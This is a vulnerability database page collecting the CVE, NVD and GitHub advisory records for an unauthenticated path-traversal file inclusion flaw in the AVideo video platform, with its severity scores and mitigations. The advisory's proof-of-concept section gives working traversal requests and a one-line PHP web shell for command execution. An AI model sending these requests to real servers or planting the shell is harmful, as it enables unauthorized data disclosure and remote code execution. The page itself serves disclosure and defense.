Vulnerability-Lookup

CVE-2026-33513 (GCVE-0-2026-33513)

Vulnerability from cvelistv5 – Published: 2026-03-23 18:21 – Updated: 2026-03-24 14:27

Title

AVideo has an Unauthenticated Local File Inclusion in API locale (RCE possible with writable PHP)

Summary

WWBN AVideo is an open source video platform. In versions up to and including 26.0, an unauthenticated API endpoint (`APIName=locale`) concatenates user input into an `include` path with no canonicalization or whitelist. Path traversal is accepted, so arbitrary PHP files under the web root can be included. In our test this yielded confirmed file disclosure and code execution of existing PHP content (e.g., `view/about.php`), and it *can* escalate to RCE if an attacker can place or control a PHP file elsewhere in the tree. As of time of publication, no patched versions are available.

Severity ?

8.6 (High)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L

CWE

CWE-22 - Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
CWE-98 - Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion')

Assigner

GitHub_M

References

URL

Tags

https://github.com/WWBN/AVideo/security/advisorie…

x_refsource_CONFIRM

Impacted products

	Vendor	Product	Version
	WWBN	AVideo	Affected: <= 26.0

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2026-33513",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "yes"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-03-24T14:27:36.702289Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-03-24T14:27:53.769Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "AVideo",
          "vendor": "WWBN",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c= 26.0"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "WWBN AVideo is an open source video platform. In versions up to and including 26.0, an unauthenticated API endpoint (`APIName=locale`) concatenates user input into an `include` path with no canonicalization or whitelist. Path traversal is accepted, so arbitrary PHP files under the web root can be included. In our test this yielded confirmed file disclosure and code execution of existing PHP content (e.g., `view/about.php`), and it *can* escalate to RCE if an attacker can place or control a PHP file elsewhere in the tree. As of time of publication, no patched versions are available."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "LOW",
            "baseScore": 8.6,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "LOW",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-22",
              "description": "CWE-22: Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        },
        {
          "descriptions": [
            {
              "cweId": "CWE-98",
              "description": "CWE-98: Improper Control of Filename for Include/Require Statement in PHP Program (\u0027PHP Remote File Inclusion\u0027)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-03-23T18:21:59.156Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/WWBN/AVideo/security/advisories/GHSA-8fw8-q79c-fp9m",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-8fw8-q79c-fp9m"
        }
      ],
      "source": {
        "advisory": "GHSA-8fw8-q79c-fp9m",
        "discovery": "UNKNOWN"
      },
      "title": "AVideo has an Unauthenticated Local File Inclusion in API locale (RCE possible with writable PHP)"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2026-33513",
    "datePublished": "2026-03-23T18:21:59.156Z",
    "dateReserved": "2026-03-20T16:59:08.891Z",
    "dateUpdated": "2026-03-24T14:27:53.769Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2",
  "vulnerability-lookup:meta": {
    "nvd": "{\"cve\":{\"id\":\"CVE-2026-33513\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-03-23T19:16:40.593\",\"lastModified\":\"2026-03-25T17:52:58.517\",\"vulnStatus\":\"Analyzed\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"WWBN AVideo is an open source video platform. In versions up to and including 26.0, an unauthenticated API endpoint (`APIName=locale`) concatenates user input into an `include` path with no canonicalization or whitelist. Path traversal is accepted, so arbitrary PHP files under the web root can be included. In our test this yielded confirmed file disclosure and code execution of existing PHP content (e.g., `view/about.php`), and it *can* escalate to RCE if an attacker can place or control a PHP file elsewhere in the tree. As of time of publication, no patched versions are available.\"},{\"lang\":\"es\",\"value\":\"WWBN AVideo es una plataforma de video de c\u00f3digo abierto. En versiones hasta la 26.0 inclusive, un endpoint de API no autenticado (\u0027APIName=locale\u0027) concatena la entrada del usuario en una ruta de \u0027include\u0027 sin canonicalizaci\u00f3n ni lista blanca. Se acepta el salto de ruta, por lo que archivos PHP arbitrarios bajo la ra\u00edz web pueden ser incluidos. En nuestra prueba, esto result\u00f3 en divulgaci\u00f3n de archivos y ejecuci\u00f3n de c\u00f3digo confirmadas de contenido PHP existente (por ejemplo, \u0027view/about.php\u0027), y *puede* escalar a RCE si un atacante puede colocar o controlar un archivo PHP en otro lugar del \u00e1rbol. En el momento de la publicaci\u00f3n, no hay versiones parcheadas disponibles.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L\",\"baseScore\":8.6,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"LOW\",\"availabilityImpact\":\"LOW\"},\"exploitabilityScore\":3.9,\"impactScore\":4.7},{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\",\"baseScore\":7.5,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"NONE\",\"availabilityImpact\":\"NONE\"},\"exploitabilityScore\":3.9,\"impactScore\":3.6}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-22\"},{\"lang\":\"en\",\"value\":\"CWE-98\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:wwbn:avideo:*:*:*:*:*:*:*:*\",\"versionEndIncluding\":\"26.0\",\"matchCriteriaId\":\"774C24F1-9D26-484F-B931-1DA107C8F588\"}]}]}],\"references\":[{\"url\":\"https://github.com/WWBN/AVideo/security/advisories/GHSA-8fw8-q79c-fp9m\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]}]}}",
    "vulnrichment": {
      "containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2026-33513\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"yes\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-03-24T14:27:36.702289Z\"}}}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2026-03-24T14:27:48.360Z\"}}], \"cna\": {\"title\": \"AVideo has an Unauthenticated Local File Inclusion in API locale (RCE possible with writable PHP)\", \"source\": {\"advisory\": \"GHSA-8fw8-q79c-fp9m\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 8.6, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"HIGH\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L\", \"integrityImpact\": \"LOW\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"LOW\", \"privilegesRequired\": \"NONE\", \"confidentialityImpact\": \"HIGH\"}}], \"affected\": [{\"vendor\": \"WWBN\", \"product\": \"AVideo\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c= 26.0\"}]}], \"references\": [{\"url\": \"https://github.com/WWBN/AVideo/security/advisories/GHSA-8fw8-q79c-fp9m\", \"name\": \"https://github.com/WWBN/AVideo/security/advisories/GHSA-8fw8-q79c-fp9m\", \"tags\": [\"x_refsource_CONFIRM\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"WWBN AVideo is an open source video platform. In versions up to and including 26.0, an unauthenticated API endpoint (`APIName=locale`) concatenates user input into an `include` path with no canonicalization or whitelist. Path traversal is accepted, so arbitrary PHP files under the web root can be included. In our test this yielded confirmed file disclosure and code execution of existing PHP content (e.g., `view/about.php`), and it *can* escalate to RCE if an attacker can place or control a PHP file elsewhere in the tree. As of time of publication, no patched versions are available.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-22\", \"description\": \"CWE-22: Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)\"}]}, {\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-98\", \"description\": \"CWE-98: Improper Control of Filename for Include/Require Statement in PHP Program (\u0027PHP Remote File Inclusion\u0027)\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2026-03-23T18:21:59.156Z\"}}}",
      "cveMetadata": "{\"cveId\": \"CVE-2026-33513\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2026-03-24T14:27:53.769Z\", \"dateReserved\": \"2026-03-20T16:59:08.891Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2026-03-23T18:21:59.156Z\", \"assignerShortName\": \"GitHub_M\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.2"
    }
  }
}

FKIE_CVE-2026-33513

Vulnerability from fkie_nvd - Published: 2026-03-23 19:16 - Updated: 2026-03-25 17:52

Severity ?

8.6 (High) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L
7.5 (High) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Summary

References

	URL	Tags
	security-advisories@github.com	https://github.com/WWBN/AVideo/security/advisories/GHSA-8fw8-q79c-fp9m	Exploit, Vendor Advisory

Impacted products

	Vendor	Product	Version
	wwbn	avideo	*

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:wwbn:avideo:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "774C24F1-9D26-484F-B931-1DA107C8F588",
              "versionEndIncluding": "26.0",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "WWBN AVideo is an open source video platform. In versions up to and including 26.0, an unauthenticated API endpoint (`APIName=locale`) concatenates user input into an `include` path with no canonicalization or whitelist. Path traversal is accepted, so arbitrary PHP files under the web root can be included. In our test this yielded confirmed file disclosure and code execution of existing PHP content (e.g., `view/about.php`), and it *can* escalate to RCE if an attacker can place or control a PHP file elsewhere in the tree. As of time of publication, no patched versions are available."
    },
    {
      "lang": "es",
      "value": "WWBN AVideo es una plataforma de video de c\u00f3digo abierto. En versiones hasta la 26.0 inclusive, un endpoint de API no autenticado (\u0027APIName=locale\u0027) concatena la entrada del usuario en una ruta de \u0027include\u0027 sin canonicalizaci\u00f3n ni lista blanca. Se acepta el salto de ruta, por lo que archivos PHP arbitrarios bajo la ra\u00edz web pueden ser incluidos. En nuestra prueba, esto result\u00f3 en divulgaci\u00f3n de archivos y ejecuci\u00f3n de c\u00f3digo confirmadas de contenido PHP existente (por ejemplo, \u0027view/about.php\u0027), y *puede* escalar a RCE si un atacante puede colocar o controlar un archivo PHP en otro lugar del \u00e1rbol. En el momento de la publicaci\u00f3n, no hay versiones parcheadas disponibles."
    }
  ],
  "id": "CVE-2026-33513",
  "lastModified": "2026-03-25T17:52:58.517",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "LOW",
          "baseScore": 8.6,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "LOW",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L",
          "version": "3.1"
        },
        "exploitabilityScore": 3.9,
        "impactScore": 4.7,
        "source": "security-advisories@github.com",
        "type": "Secondary"
      },
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "NONE",
          "baseScore": 7.5,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "NONE",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
          "version": "3.1"
        },
        "exploitabilityScore": 3.9,
        "impactScore": 3.6,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ]
  },
  "published": "2026-03-23T19:16:40.593",
  "references": [
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Exploit",
        "Vendor Advisory"
      ],
      "url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-8fw8-q79c-fp9m"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Analyzed",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-22"
        },
        {
          "lang": "en",
          "value": "CWE-98"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Primary"
    }
  ]
}

GHSA-8FW8-Q79C-FP9M

Vulnerability from github – Published: 2026-03-20 21:55 – Updated: 2026-03-25 20:44

Summary

AVideo has an Unauthenticated Local File Inclusion in API locale (RCE possible with writable PHP)

Details

Summary

An unauthenticated API endpoint (APIName=locale) concatenates user input into an include path with no canonicalization or whitelist. Path traversal is accepted, so arbitrary PHP files under the web root can be included. In our test this yielded confirmed file disclosure and code execution of existing PHP content (e.g., view/about.php), and it can escalate to RCE if an attacker can place or control a PHP file elsewhere in the tree.

Details

Entry point: plugin/API/get.json.php sets $global['bypassSameDomainCheck']=1 and merges GET/POST/JSON into $parameters without authentication or API secret.
Handler: plugin/API/API.php, method get_api_locale() (lines ~5009–5023): php $parameters['language'] = strtolower($parameters['language']); $file = "{$global['systemRootPath']}locale/{$parameters['language']}.php"; if (!file_exists($file)) { return new ApiObject("This language does not exists"); } include $file; No validation is performed; ../ traversal is accepted.
Because include executes PHP, any reachable PHP file is executed in the web server context.

PoC

Fetch an arbitrary PHP file (no auth): GET /plugin/API/get.json.php?APIName=locale&language=../view/about HTTP/1.1 Host: <target> Response returns the rendered About page HTML, proving traversal outside locale/.
RCE with an attacker PHP file (any writable PHP path): GET /plugin/API/get.json.php?APIName=locale&language=../videos/locale/shell&x=whoami If shell.php contains <?php system($_GET['x']); ?>, the response includes command output.

Impact

Unauthenticated file inclusion of arbitrary PHP files under the web root.
Confidential data leakage (e.g., configuration, secrets) via included PHP that renders output.
Potential RCE if any attacker-writable PHP file exists elsewhere (not confirmed in this build).
Affects any deployment with the API plugin enabled (default in docker-compose).

Mitigation

Reject path separators/dots and enforce a strict allowlist of locale slugs.
realpath the target and ensure it stays within $systemRootPath/locale.
Stop using include for translations; load data from vetted formats (JSON/array).
Add authentication (API secret/token) to the endpoint as a secondary control.

Severity ?

8.6 (High)


                  
                    CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "wwbn/avideo"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "26.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-33513"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-22",
      "CWE-98"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-20T21:55:31Z",
    "nvd_published_at": "2026-03-23T19:16:40Z",
    "severity": "HIGH"
  },
  "details": "### Summary\nAn unauthenticated API endpoint (`APIName=locale`) concatenates user input into an `include` path with no canonicalization or whitelist. Path traversal is accepted, so arbitrary PHP files under the web root can be included. In our test this yielded confirmed file disclosure and code execution of existing PHP content (e.g., `view/about.php`), and it *can* escalate to RCE if an attacker can place or control a PHP file elsewhere in the tree. \n### Details\n- Entry point: `plugin/API/get.json.php` sets `$global[\u0027bypassSameDomainCheck\u0027]=1` and merges GET/POST/JSON into `$parameters` without authentication or API secret.\n- Handler: `plugin/API/API.php`, method `get_api_locale()` (lines ~5009\u20135023):\n  ```php\n  $parameters[\u0027language\u0027] = strtolower($parameters[\u0027language\u0027]);\n  $file = \"{$global[\u0027systemRootPath\u0027]}locale/{$parameters[\u0027language\u0027]}.php\";\n  if (!file_exists($file)) { return new ApiObject(\"This language does not exists\"); }\n  include $file;\n  ```\n  No validation is performed; `../` traversal is accepted.\n- Because `include` executes PHP, any reachable PHP file is executed in the web server context.\n\n### PoC\n1. Fetch an arbitrary PHP file (no auth):\n   ```\n   GET /plugin/API/get.json.php?APIName=locale\u0026language=../view/about HTTP/1.1\n   Host: \u003ctarget\u003e\n   ```\n   Response returns the rendered About page HTML, proving traversal outside `locale/`.\n2. RCE with an attacker PHP file (any writable PHP path):\n   ```\n   GET /plugin/API/get.json.php?APIName=locale\u0026language=../videos/locale/shell\u0026x=whoami\n   ```\n   If `shell.php` contains `\u003c?php system($_GET[\u0027x\u0027]); ?\u003e`, the response includes command output.\n\n### Impact\n- Unauthenticated file inclusion of arbitrary PHP files under the web root.\n- Confidential data leakage (e.g., configuration, secrets) via included PHP that renders output.\n- Potential RCE *if* any attacker-writable PHP file exists elsewhere (not confirmed in this build).\n- Affects any deployment with the API plugin enabled (default in docker-compose).\n\n### Mitigation\n- Reject path separators/dots and enforce a strict allowlist of locale slugs.\n- `realpath` the target and ensure it stays within `$systemRootPath/locale`.\n- Stop using `include` for translations; load data from vetted formats (JSON/array).\n- Add authentication (API secret/token) to the endpoint as a secondary control.",
  "id": "GHSA-8fw8-q79c-fp9m",
  "modified": "2026-03-25T20:44:38Z",
  "published": "2026-03-20T21:55:31Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-8fw8-q79c-fp9m"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33513"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/WWBN/AVideo"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L",
      "type": "CVSS_V3"
    }
  ],
  "summary": "AVideo has an Unauthenticated Local File Inclusion in API locale (RCE possible with writable PHP)"
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2026-33513 (GCVE-0-2026-33513)

FKIE_CVE-2026-33513

GHSA-8FW8-Q79C-FP9M

Summary

Details

PoC

Impact

Mitigation

Tags

Sightings

Nomenclature